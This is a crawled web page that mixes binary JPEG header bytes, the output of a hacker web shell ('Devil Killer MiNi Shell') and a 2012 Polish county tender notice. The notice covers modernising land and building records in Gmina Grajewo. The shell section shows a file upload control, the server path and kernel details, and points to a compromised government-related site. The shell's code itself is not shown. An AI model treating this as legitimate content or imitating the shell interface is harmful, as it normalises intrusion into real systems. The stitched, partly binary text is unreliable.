JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120516/157950-N-2012.html

<p class="kh_header"><b>Grajewo: Wykonanie modernizacji ewidencji gruntów i założenie ewidencji budynków i lokali dla pozostałej części w ilości 10 obrębów Gminy Grajewo, powiat Grajewski,  województwo Podlaskie oraz wykonanie pełnej modernizacji operatu ewidencji gruntów i budynków dla 7 obrębów tej gminy.</b><br>
<b>Numer ogłoszenia: 157950 - 2012; data zamieszczenia: 16.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo  Powiatowe w Grajewie , ul. Strażacka 6B, 19-200 Grajewo, woj. podlaskie, tel. 86 273 84 63, faks 86 273 84 62.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie modernizacji ewidencji gruntów i założenie ewidencji budynków i lokali dla pozostałej części w ilości 10 obrębów Gminy Grajewo, powiat Grajewski,  województwo Podlaskie oraz wykonanie pełnej modernizacji operatu ewidencji gruntów i budynków dla 7 obrębów tej gminy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie modernizacji ewidencji gruntów i założenie ewidencji budynków i lokali dla pozostałej części w ilości 10 obrębów Gminy Grajewo, powiat Grajewski,  województwo Podlaskie oraz wykonanie pełnej modernizacji operatu ewidencji gruntów i budynków dla 7 obrębów tej gminy.

Celem prac modernizacyjnych jest założenie ewidencji budynków i lokali oraz w niezbędnym zakresie aktualizacja budowlanych użytków gruntowych na obszarze 10 obrębów gminy Grajewo następujących  miejscowości: Białogrądy, Ciemnoszyje, Kapice, Przechody, Sikora, Sojczyn Borowy, Sojczyn Grądowy, Szymany, Toczyłowo, Łamane Grądy oraz modernizacji operatu ewidencji gruntów i budynków bez zakładania ewidencji budynków dla 7 obrębów ewidencyjnych tej gminy : Elżbiecin, Konopki, Konopki-Kolonie, Kurejwa, Kurejewka, Kurki i Uścianki z ustaleniem granic zewnętrznych tych obrębów oraz ustaleniem stanu władania poszczególnych działek  z udziałem stron.

Prace zostaną wykonane w ramach modernizacji operatu ewidencyjnego w trybie § 56 pkt. 2 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001 roku, w sprawie ewidencji gruntów i budynków  Dz. U. Nr 38, poz. 454 .

Zakres prac modernizacyjnych :
1. pobranie materiałów z Powiatowego Ośrodka Dokumentacji Geodezyjnej 
i Kartograficznej i ich analiza pod kątem wykorzystania do prac modernizacyjnych,  
2. badanie KW oraz innych dokumentów dla nieruchomości zabudowanych, nieruchomości budynkowych lub lokalowych 10 obrębów oraz badanie KW dla nieruchomości gruntowych 7 obrębów . Stany prawne nieruchomości gruntowych
 i zabudowanych nieruchomości gruntowych przyjęte zostaną na podstawie dotychczasowych ustaleń w istniejącym operacie ewidencyjnym i sprawdzeniu na gruncie  . W Sądzie Rejonowym w Grajewie w V Wydziale Ksiąg Wieczystych należy zbadać działy I, II, III i sporządzić  protokoły z badania , 
3.  inwentaryzacja osnowy geodezyjnej, założenie, pomiar i wyrównanie osnowy pomiarowej poziomej dla wykonania nowego pomiaru stanu posiadania  dla 7 obrębów gminy Grajewo, dla których ewidencja gruntów została założona w oparciu o podkład fotogrametryczny, wraz z przeglądem, uzgodnieniem i pomiarem przebiegu granic zewnętrznych ww obrębów objętych modernizacją z granicami obrębów sąsiadujących,
4. wykonanie nowego pomiaru stanu władania z udziałem stron ww obrębów . Istniejące rowy melioracji szczegółowej wykazane jako działki należy włączyć do działek przyległych ustalając granice z udziałem stron. Pomiar wykonać stosownie do postanowień § 37,38 rozporządzenia w sprawie ewidencji gruntów i budynków, 
w przypadku gdy stwierdzi się brak w dokumentacji wymienionej w § 36 rozporządzenia, danych opisujących  granice działek lub jeżeli zawarte w niej dane będą niewiarygodne, lub nie będą odpowiadać obowiązującym standardom technicznym,
5. wykonanie wywiadów oraz terenowych pomiarów uzupełniających dla brakujących na mapie zasadniczej i ewidencyjnej obiektów budowlanych wraz z kontrolnym pomiarem istniejących budynków oraz ewentualna aktualizacja konturów budowlanych,
6. naniesienie wyników pomiarów na mapę zasadniczą i ewidencyjną,
7. sprawdzenie poprawności ujawnionych na mapie ewidencyjnej granic terenów zabudowanych oraz ich korekta w oparciu o dokumentację znajdującą się w zasobie PODGiK lub pomiar kontrolny wykonany bezpośrednio na gruncie,  
8. sporządzenie arkuszy spisowych budynków i prawnie wyodrębnionych lokali,
9. sporządzenie kartotek budynków i lokali ( jeżeli występują),
10.utworzenie komputerowego zbioru budynków i lokali oraz opracowanie mapy numerycznej ewidencji gruntów  i budynków,
11. obliczenie współrzędnych punktów granicznych pozyskanych z nowego pomiaru na gruncie zgodnie z § 37 i 38 Rozporządzenia MRRiB z dnia 29 marca 2001 roku oraz powierzchni działek ewidencyjnych w układzie państwowym 2000 z  przetransformowaniem na układ 1965,konturów klasyfikacyjnych i użytków oraz sporządzenie wykazów porównania powierzchni działek ewidencyjnych  według wzoru nr11 Instrukcji G-5, nadać przewidziane w Instrukcji G-5 atrybuty dla obliczonych punktów granicznych działek
12.sporządzenie dla 7 obrębów ewidencyjnych gm. Grajewo, wyplotów zarysów pomiarowych na folii w skali1:5000 , lub innej - wyniesienie, w kroju obrębowym,
13. modyfikacja graficznej bazy ewidencji gruntów i budynków prowadzonej w formie informatycznej o pozyskane dane w postaci obliczonych współrzędnych punktów granicznych działek z dostosowaniem istniejących konturów użytków i klas gruntów do nowego przebiegu granic działek oraz dokonanie wyplotów nowych map ewidencji gruntów w skali 1 :5000 ( dla 7 obrębów i dla 10 obrębów z uzupełnieniem bazy EWMAPY o budynki ) w kroju obrębowym , oraz uzupełnienie bazy EWOPIS danymi ewidencyjnymi dotyczącymi działek, użytków gruntowych , budynków i lokali oraz edycja wymaganych raportów
14. sporządzenie projektu operatu opisowo-kartograficznego ,
15. poinformowanie o terminie i miejscu wyłożenia, o którym mowa w art. 24a ust. 4 ustawy Prawo geodezyjnei kartograficzne, poprzez wywieszenie tej informacji na tablicy ogłoszeń w siedzibie Starostwa Powiatowego w Grajewie i Urzędu Gminy 
w Grajewie, na co najmniej 14 dni przed dniem wyłożenia, oraz ogłoszenia jej w prasie o zasięgu krajowym, zapoznanie zainteresowanych z danymi ewidencyjnymi ujawnionymi w opracowanym projekcie, spisanie protokółu z wyłożenia projektu
 i zgłoszonych uwag i zastrzeżeń( dotyczy projektu operatu ewidencji budynków dla 10 obrębów i 7 obrębów ewidencji gruntów ),
16.przekazanie dokumentacji i materiałów gotowych do zasilenia powiatowej bazy ewidencji gruntów i budynków.

Charakterystyka obiektu:
Województwo: podlaskie,
Powiat: grajewski
Jednostka ewidencyjna: Gmina Grajewo składa się z 48 obrębów. Do końca 2011 roku założona została ewidencja budynków dla 38 obrębów. W 2012 roku należy założyć ewidencję budynków i lokali  jeżeli występują) dla pozostałych 10 obrębów. 
Powierzchnia terenów zabudowanych ( ujawnionych w ewidencji gruntów) - do opracowania w 2012 roku - 137 ha ( ogólna powierzchni  14671 ha ) 
Ogólna liczba działek ewidencyjnych 10 obrębów 6051 sztuk (działek zabudowanych 669 sztuk ) .
Ogólna szacowana liczba budynków podlegających ujawnieniu w egib - około 2500 ( na mapie zasadniczej i ewidencyjnej około 2400 sztuk).Szacuje się, że około 80% ilości budynków pochodzi z wektoryzacji mapy zasadniczej .
Liczba budynków ujawniona na mapie zasadniczej - około 2400 sztuk.
Liczba obrębów ewidencyjnych - dla których należy wykonać pełną modernizację ewidencji gruntów z ustaleniem granic zewnętrznych z sąsiadującymi obrębami i pomiarem stanu władania na gruncie z udziałem stron i pozyskaniem danych z pomiaru bezpośredniego w terenie do aktualizacji bazy opisowej i graficznej ewidencji gruntów i budynków                   bez zakładania ewidencji budynków - 7 obrębów .
Liczba działek - 1509 sztuk .
Powierzchnia - 2096 ha .

17.  Ramowy zakres prac przewidzianych do realizacji w ramach zamówienia publicznego określają warunki techniczne modernizacji ewidencji i założenie ewidencji budynków i lokali dla Gminy Grajewo , stanowiące załącznik Nr 1 do SIWZ.

18.Wymagany okres gwarancji dla przedmiotu zamówienia wynosi 60 miesięcy od dnia odebrania przez Zamawiającego przedmiotu zamówienia i podpisania bez uwag protokołu końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.43.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1Zamawiający wymaga wniesienia wadium w kwocie 4 000,00 zł (słownie złotych: cztery tysiące).
2. wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub  kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej , z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa  w art.6b ust.5 pkt2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. z 2007r. Nr 42, poz.275, z 2008r. Nr 116, poz.730 i 732 i Nr 227, poz.1505 oraz z 2010r. Nr 96, poz. 620.)
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr 22 1020 1332 0000 1902 0037 9404  PKO BP S.A. ROK w Białymstoku CK w Łomży z podaniem tytułu ,,wadium nr sprawy WO.272.4.2012 Za termin wniesienia wadium w formie pieniężnej będzie przyjęty termin uznania na rachunku zamawiającego. Kopie dowodu wpłaty należy dołączyć do oferty.
5. Wadium wniesione w poręczeniach bankowych, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa  w art.6b ust.5 pkt2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. z 2007r. Nr 42, poz.275 z 2008r. Nr 116, poz.730 i 732 i Nr 227, poz.1505 oraz z 2010r. Nr 96, poz. 620.) należy dołączyć w oryginale do oferty.
6.  Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem, że Zamawiający zatrzyma wadium   jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26.ust.3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie. 
7. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, zamawiający  zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.
8. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofa ofertę przed upływem terminu składania ofert.
9. Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, a o którym mowa w pkt 8.6 , jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca  wniesie wadium w terminie określonym przez zamawiającego.
10. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
11. Zamawiający zatrzyma wadium  wraz z odsetkami, jeżeli wykonawca, którego oferta zostanie wybrana:
1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.2.1	Zamawiający uzna, iż Wykonawca spełnia wymóg posiadania uprawnień  do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, gdy Wykonawca wykaże iż posiada uprawnienia do występowania w obrocie prawnym i prowadzenia działalności w zakresie objętym niniejszym zamówieniem. (oświadczenie z art.22 ust.1 Ustawy Prawo Zamówień Publicznych).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia wymóg posiadania niezbędnej wiedzy 
i doświadczenia, jeżeli wykaże, że zrealizował w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jedno opracowanie o zakresie tożsamym lub podobnym do niniejszego zamówienia tzn. wykonał pełną modernizację ewidencji gruntów i budynków w tym założenie ewidencji budynków co najmniej w ilości 2 000 sztuk budynków dla co najmniej 10 obrębów ewidencyjnych, z podaniem ich  wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie (referencje, opinie zamawiających, kopie protokołów odbioru).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia wymóg dysponowania odpowiednim potencjałem technicznym  do wykonania zamówienia, na podstawie złożonego przez Wykonawcę oświadczenia  o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1, ustawy Prawo Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia wymóg dysponowania osobami zdolnymi do wykonania zamówienia, na podstawie złożonego przez Wykonawcę oświadczenia  o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1, ustawy Prawo Zamówień Publicznych oraz na podstawie oświadczenia że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia,  jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień. Zamówienie winien wykonywać zespół składający się z czterech osób w tym dwie osoby winny posiadać uprawnienia zawodowe w zakresie 1 i 2 zgodnie z art. 43 ustawy-Prawo geodezyjne i kartograficzne, a co najmniej jedna osoba powinna posiadać uprawnienienia zawodowe do klasyfikacji gruntów stosownie do przepisów Rozporządzenia Rady Ministrów w sprawie klasyfikacji gruntów z dnia 4 czerwca 1956 r. ( Dz. U. Nr 19, poz.97 z późn, zm.) Należy przedstawić potwierdzone za zgodność z oryginałem kserokopie uprawnień zawodowych osób biorących udział w realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia na podstawie  złożonego oświadczenia przez Wykonawcę oświadczenia  o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1, ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.starostwograjewo.pl<br>
